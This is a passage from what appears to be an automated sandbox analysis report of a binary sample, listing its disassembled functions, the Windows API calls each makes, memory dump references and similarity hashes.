                                                                                                                                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 0077409C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007730A5,?,00000001), ref: 007740AE
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 007740F3
                                                                                                                                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 00774108
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007730A5,?,00000001), ref: 00774113
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                    • Opcode ID: 29e73897091edcd20a3bf00646cec48e0e7584c21cc170a82b2af45722b6d487
                                                                                                                                                    • Instruction ID: 3f6274aaa73b7fad464c719f1409f22f910f17e8a2f70f029c68df44ca483caf
                                                                                                                                                    • Opcode Fuzzy Hash: 29e73897091edcd20a3bf00646cec48e0e7584c21cc170a82b2af45722b6d487
                                                                                                                                                    • Instruction Fuzzy Hash: 6D318F75500208ABDF20EB68DC99F7977B9AB54391F11C205F908E6290EBBC9D80CF79
                                                                                                                                                    Function 007ADD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0074B496
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0074B4A0
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0074B4B5
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0074B4BD
                                                                                                                                                    • GetClientRect.USER32(?), ref: 007ADD63
                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 007ADD7A
                                                                                                                                                    • GetWindowDC.USER32(?), ref: 007ADD86
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007ADD95
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007ADDA7
                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 007ADDC5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3430376129-0
                                                                                                                                                    • Opcode ID: ef5fcd77cc99427c74d4df7f4c40fc0da5eb208df7d8989acdc33d9e0d9e0c07
                                                                                                                                                    • Instruction ID: 3cba804b87ed1c47462376b0182093ba70601a0e1456391ddde2d3d534cbba7f
                                                                                                                                                    • Opcode Fuzzy Hash: ef5fcd77cc99427c74d4df7f4c40fc0da5eb208df7d8989acdc33d9e0d9e0c07
                                                                                                                                                    • Instruction Fuzzy Hash: 56117935500209EFDB316BA8EC08FE93B65EB05325F118721FA66950E2EB394D51DF24
                                                                                                                                                    Function 00733093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007330DC
                                                                                                                                                    • CoUninitialize.OLE32(?,00000000), ref: 00733181
                                                                                                                                                    • UnregisterHotKey.USER32(?), ref: 007332A9
                                                                                                                                                    • DestroyWindow.USER32(?), ref: 007A5079
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 007A50F8
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007A5125
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                    • String ID: close all
                                                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                                                    • Opcode ID: cdefc6002ee4cebbc6cb7273227c353e4fe38ef96445ac17d51e3d554eb68e04
                                                                                                                                                    • Instruction ID: 72f660f92cb79ed025d304944a0eed779777bace198eaf8e21474faf03a2da79
                                                                                                                                                    • Opcode Fuzzy Hash: cdefc6002ee4cebbc6cb7273227c353e4fe38ef96445ac17d51e3d554eb68e04
                                                                                                                                                    • Instruction Fuzzy Hash: 58912B74600106CFD729EF24C899F69F3A4FF15304F5482A9E50AA7263DB38AE66CF54
                                                                                                                                                    Function 0074CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 0074CC15
                                                                                                                                                      • Part of subcall function 0074CCCD: GetClientRect.USER32(?,?), ref: 0074CCF6
                                                                                                                                                      • Part of subcall function 0074CCCD: GetWindowRect.USER32(?,?), ref: 0074CD37
                                                                                                                                                      • Part of subcall function 0074CCCD: ScreenToClient.USER32(?,?), ref: 0074CD5F
                                                                                                                                                    • GetDC.USER32 ref: 007AD137
                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD14A
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 007AD158
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 007AD16D
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007AD175
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD200
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                                                    • Opcode ID: e89c2c04cf4beea1bde6607bd4e43fb84544c858eff57accaf699c3526f29a0d
                                                                                                                                                    • Instruction ID: af8a62c15557f39f10192b53f840bda9df06c1957d5fefb371efa5c7af511072
                                                                                                                                                    • Opcode Fuzzy Hash: e89c2c04cf4beea1bde6607bd4e43fb84544c858eff57accaf699c3526f29a0d
                                                                                                                                                    • Instruction Fuzzy Hash: D071DF31400209DFCF318F64C885AAA3BB5FF8A354F148369ED569A6A6D7398C41DF60
                                                                                                                                                    Function 0079ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                      • Part of subcall function 0074B63C: GetCursorPos.USER32(000000FF), ref: 0074B64F
                                                                                                                                                      • Part of subcall function 0074B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0074B66C
                                                                                                                                                      • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000001), ref: 0074B691
                                                                                                                                                      • Part of subcall function 0074B63C: GetAsyncKeyState.USER32(00000002), ref: 0074B69F
                                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0079ED3C
                                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 0079ED42
                                                                                                                                                    • ReleaseCapture.USER32 ref: 0079ED48
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0079EDF0
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0079EE03
                                                                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0079EEDC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                                                                    • Opcode ID: 2922aa1cd12b88539384bf44d9d19143aa21e4cc68205c4a62cfb349615bdaf4
                                                                                                                                                    • Instruction ID: dd7cabb2230fdf96ea757eaf300b0b0b499e1b6058fede27c403d35927182586
                                                                                                                                                    • Opcode Fuzzy Hash: 2922aa1cd12b88539384bf44d9d19143aa21e4cc68205c4a62cfb349615bdaf4
                                                                                                                                                    • Instruction Fuzzy Hash: 2A518A70204304EFEB10DF20DC9AF6A77E4FB88714F408A2DF595972A2DB789954CB52
                                                                                                                                                    Function 007845C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007845FF
                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0078462B
                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0078466D
                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00784682
                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0078468F
                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007846BF
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00784706
                                                                                                                                                      • Part of subcall function 00785052: GetLastError.KERNEL32(?,?,007843CC,00000000,00000000,00000001), ref: 00785067
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1241431887-3916222277
                                                                                                                                                    • Opcode ID: 83ab6ac6f92b17505769019e2ba5d2d91bb1cefa5ae0d99b75934d2a7eb3fcd0
                                                                                                                                                    • Instruction ID: 760e4f2e4ab280a9b2a74d4ec5e96b03d11e0df8978c151377f3bfd2ef1c01f4
                                                                                                                                                    • Opcode Fuzzy Hash: 83ab6ac6f92b17505769019e2ba5d2d91bb1cefa5ae0d99b75934d2a7eb3fcd0
                                                                                                                                                    • Instruction Fuzzy Hash: 4E4173B1641206BFEB15AF50CC89FFB77ACFF09354F104116FA059A141EBB89D448BA4
                                                                                                                                                    Function 0078B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007CDC00), ref: 0078B715
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007CDC00), ref: 0078B749
                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0078B8C1
                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0078B8EB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 560350794-0
                                                                                                                                                    • Opcode ID: da56426c273c18bb52322d7756eeb249e2eaaf07abf578dac9fed677c734666d
                                                                                                                                                    • Instruction ID: 6a8b78bebf7714c04238967e9f7cf9565ce43a3d1b2c96c5423fa5b7e1ed2f0b
                                                                                                                                                    • Opcode Fuzzy Hash: da56426c273c18bb52322d7756eeb249e2eaaf07abf578dac9fed677c734666d
                                                                                                                                                    • Instruction Fuzzy Hash: 90F16E75A00209EFCF14EFA4C888EAEB7B9FF48315F108459F905AB251DB35AE45CB90
                                                                                                                                                    Function 007924D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 007924F5
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00792688
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007926AC
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007926EC
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0079270E
                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0079286F
                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007928A1
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 007928D0
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00792947
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4090791747-0
                                                                                                                                                    • Opcode ID: f8c9ce40099e025b0d5d0cb4b82f89b8d31cf281283a7370ab2613692603486f
                                                                                                                                                    • Instruction ID: 7c7376102feba0bd04aeebba7745b14b2baee12147a5458f9e218f16a1afb4f5
                                                                                                                                                    • Opcode Fuzzy Hash: f8c9ce40099e025b0d5d0cb4b82f89b8d31cf281283a7370ab2613692603486f
                                                                                                                                                    • Instruction Fuzzy Hash: 67D1CF31604300EFCB15EF24D895B6ABBE5BF84310F15856DF9899B2A2DB38EC45CB52
                                                                                                                                                    Function 0079B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0079B3F4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InvalidateRect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 634782764-0
                                                                                                                                                    • Opcode ID: 011e8db9ae16012cb9eaaa4b184d8b276105284a9dd319664dc382f4af8929ce
                                                                                                                                                    • Instruction ID: 0f7daedf7fe107e0fdd2e2d99dc654d8642a6560ee53219dcf0d38cb666d7bad
                                                                                                                                                    • Opcode Fuzzy Hash: 011e8db9ae16012cb9eaaa4b184d8b276105284a9dd319664dc382f4af8929ce
                                                                                                                                                    • Instruction Fuzzy Hash: 7A517E30500208FBEF309F28BE89BA93B64EB05364F644115FA19D61E2D7B9ED509B51
                                                                                                                                                    Function 0074A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007ADB1B
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007ADB3C
                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007ADB51
                                                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007ADB6E
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007ADB95
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0074A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007ADBA0
                                                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007ADBBD
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0074A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 007ADBC8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268354404-0
                                                                                                                                                    • Opcode ID: f716694f584a12f56a184cca01a97733279e76a05d1ed492b9a86f062f3ba682
                                                                                                                                                    • Instruction ID: cd6de126a3290fc24bfc2335afecaa7a61c0cf458196523bf476d706df3ed2c0
                                                                                                                                                    • Opcode Fuzzy Hash: f716694f584a12f56a184cca01a97733279e76a05d1ed492b9a86f062f3ba682
                                                                                                                                                    • Instruction Fuzzy Hash: 39518970640209EFDB34CF68CC85FAA77B8FB58350F114628F94697690DBB8AD80CB61
                                                                                                                                                    Function 00777555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00775FA6,?), ref: 00776EF1
                                                                                                                                                      • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 007775CA
                                                                                                                                                    • _wcscmp.LIBCMT ref: 007775E2
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 007775FB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 793581249-0
                                                                                                                                                    • Opcode ID: d45a9c921c591f52154d03557c7f11fa81f4166197b372ca876667cc95ed4338
                                                                                                                                                    • Instruction ID: c549b5231d8c0e61cc88142b41afd227d83045b91f1b5cda613192a21fc9dfa8
                                                                                                                                                    • Opcode Fuzzy Hash: d45a9c921c591f52154d03557c7f11fa81f4166197b372ca876667cc95ed4338
                                                                                                                                                    • Instruction Fuzzy Hash: 695143B2A092199EDF54EB54D845DDD73BCAF08350B1085EAFA09E3041EA7896C9CFB4
                                                                                                                                                    Function 0074EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 0074EAEB
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 0074EB32
                                                                                                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 007ADC86
                                                                                                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007ADAD1,00000004,00000000,00000000), ref: 007ADCF2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ShowWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                                    • Opcode ID: 137e8216c72b9690c40b3bf44bb55649a2970acea51c97f0d991abbda3b7e3fa
                                                                                                                                                    • Instruction ID: 73607b5616d1998b49a681486f1d819fc2552df1c5b053dbabd9a1efe72a4790
